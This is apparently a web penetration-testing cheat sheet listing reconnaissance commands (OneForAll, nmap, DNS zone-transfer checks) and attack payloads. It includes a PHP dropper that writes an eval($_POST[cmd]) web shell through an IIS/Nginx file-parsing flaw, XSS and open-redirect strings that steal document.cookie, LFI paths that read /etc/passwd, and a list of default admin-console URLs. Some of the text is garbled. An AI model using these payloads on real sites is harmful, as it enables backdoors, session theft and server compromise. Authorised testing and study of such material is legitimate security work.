Information Gathering

OneForAll

• OneForAll: subdomain collection tool
• User Guide
• Command:

$ python3 oneforall.py --target example.com run > output.txt

Nmap

Check unused web port for a website.

nmap –n –P0 –sS –sV –p1-65535 –oX report.xml [target IP]

The result will be saved in report.xml.

Check Web Server/Middleware Version Vulnerabilities

Web Server/Middleware: IIS, apache, nginx.

• When IIS 7.0/IIS 7.5/Nginx<8.03 with Fast-CGI, /xx.jpg/xx.php will become a php file.
  • Sample Usage: copy xx.jpg/b + yy.txt/a xy.jpg.
  • yy.txt:

<?php
	fputs(fopen('shell.php','w')'
	<?php
		eval($_POST[cmd])
	?>');
?>

+ go to `/xy.jpg/xx.php`, then shell.php with password `cmd` will be generated.

• Nginx<8.03 without Fast-CGI
  • /xx.jpg%00.php will make jpg file to be php file
• Apache
  • test.php.x1.x2.x3 will be test.php judging extension from right to left
• Windows
  • xx.jpg[space]或xx.jpg. will be xx.jpg, this can bypass blacklist

DNS zone transfer

DNS Zone Transfer Vulnerability will leak the following information:

1. Network Topology, the IP segment of most servers
2. The IP of the database server
3. The IP of testing servers
4. The address of the VPN server
5. Other sensitive servers

Detection Techniques:

• nslookup Example:

$ nslookup
> server dns1.xxxxxx.com
> ls xxxxxx.com

# or
$ nslookup
> set type=ns            
> npc.gov.cn
> server ns.xxxxxx.com   # set ns
> set type=axfr          # set regional transfer
> ls -d xxxxxx.com

• nmap

$ nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxxxxx.com -p 53 -Pn dns1.xxxxxx.com

• dip

$ dig xxxxxx.com ns
$ dig axfr @dns1.xxxxxx.com xxxxxx.com

• Dnsenum

Bypass WAF

• Check this

Cookie & Session

Session Fixation

1. Check whether the sessionID is changed after the user successfully logs in.
2. Attackers create new session, and they can assign the sessionID to arbitrary users.

Local Storage Problem

The use of setItem and getItem.

Sample PoC:

http://server/StoragePOC.html#<img src=x οnerrοr=alert(1)>

XSS

JS

location.search:

www.victim.com/?javascript:alert(666)

location.hash/window.location.hash.indexOf(‘msg='):

#

Burp Plugin

• Turbo Intruder: a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results

More Plugin

• Github

OpenRedirect

http://www.victim.site/?#javascript:alert(document.cookie)
http://www.victim.site/?#www.malicious.site

Cross-site Flash

crossdomain.xml:

<?xml version="1.0"?>
<cross-domain-policy> 
	<site-control permitted-cross-domain-policies="all" />
    <allow-access-from domain="*" />
    <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

HTML Injection

http://vulnerable.site/page.html?user=<img%20src='aaa'%20οnerrοr=alert(1)>

Web console leakage

tomcat, aria2, weblogic, websphere, oracle, jboss

http://hostname:port/load/
http://x.x.x.x:8080/manage/

Apache+tomcat: http://x.x.x.x:8080/manager/html http://x.x.x.x/admin

Weblogic: http://localhost:7001/console

Websphere: http://localhost:9060/ibm/console和https://localhost:9043/ibm/console/logon.jsp

Oracle web Console: http://localhost:5500/em

Mongodb web: db port + 1000 -> web

HP system managent: https://localhost:2381/cpqlogin.php?errno=100&severity=4

LFI

http://vulnerable_host/preview.php?file=../../../../etc/passwd
http://vulnerable_host/preview.php?file=../../../../etc/passwd%00

References

English

• OWASP Top Ten

Chinese

• Knownsec List
• Xray Tutorial
• CSDN - Web Pentest Skills
• Unnecessary open ports on web servers
• Web Server Parsing Error
• DNS Zone Transfer Detection
• 41